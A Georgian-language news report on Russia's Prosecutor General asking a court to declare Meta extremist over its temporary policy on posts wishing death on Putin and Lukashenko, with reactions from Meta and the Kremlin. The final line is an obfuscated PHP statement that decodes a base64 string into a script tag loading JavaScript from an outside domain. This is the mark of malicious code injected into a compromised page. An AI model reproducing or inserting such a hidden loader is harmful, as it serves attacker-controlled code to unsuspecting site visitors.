celsiusi
ავერსი შნაიდერი
Reuters-ი რუსულ სააგენტო „ინტერფაქსზე“ დაყრდნობით იუწყება, რომ რუსეთის გენერალურმა პორკურატურამ სასამართლოს მეტას ექსტრემისტულ ორგანიზაციად გამოცხადების მოთხოვნით მიმართა, რის მიზეზადაც სახელდება მეტას მიერ მიღებული გადაწყვეტილება, რაც მომხმარებლებისთვის დროებით პუტინისა და ბელარუსის პრეზიდენტ ლუკაშენკოს სიკვდილის მოწოდებების შესახებ პოსტების განთავსების უფლებას აძლევს.
 
გენერალური პროკურატურა ასევე მიმართავს რუსეთის კომუნიკაციების მარეგულირებელ სააგენტო „როსკომანდზორს“, რომ დაბლოკოს მეტას კიდევ ერთი პლატფორმა, „ინსტაგრამი“.
 
მეტას პრესსპიკერი ადასტურებს, რომ კომპანიამ დროებით შეამსუბუქა წესები პოლიტიკური პოსტების შესახებ, მომხმარებლებს უფლება მისცა, რომ მაგალითად, დაწერონ ისეთი პოსტები, როგორიც არის „სიკვდილი რუს დამპყრობლებს“; თუმცა, იქვე აცხადებს, რომ წესები არ შემსუბუქებულა რუსეთის მშვიდობიანი მოსახლეობისადმი ძალადობის შემცველი პოსტებისთვის.
 
„არ გვინდა დავიჯეროთ, უბრალოდ ძნელი დასაჯერებელია. ვიმედოვნებთ, ეს სიმართლეს არ შეესაბამება, რადგან თუ მართლაც ასეა, მოგვიწევს გადამჭრელი ზომების მიღება ამ კომპანიის საქმიანობის შესაჩერებლად“, — განუცხადა ჟურნალისტებს კრემლის პრესსპიკერმა დმიტრი პესკოვმა.
 
მეტას განცხადებით, პოლიტიკური გამოხატვის ფორმების ეს დროებითი ცვლილება, ნორმალურ ვითარებაში მის წესებს ეწინააღმდეგება. სამეთვალყურეო საბჭოს განცხადებით, ამის მიზეზია მეტას პასუხი უკრაინაში მიმდინარე ომზე.
 
ცნობისთვის, რამდენიმე დღის წინ, რუსეთმა საკუთარ ტერიტორიაზე დაბლოკა „ფეისბუქი“ და „ტვიტერიც“. დაგეგმილია ვიკიპედიის დაბლოკვაც.
787
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");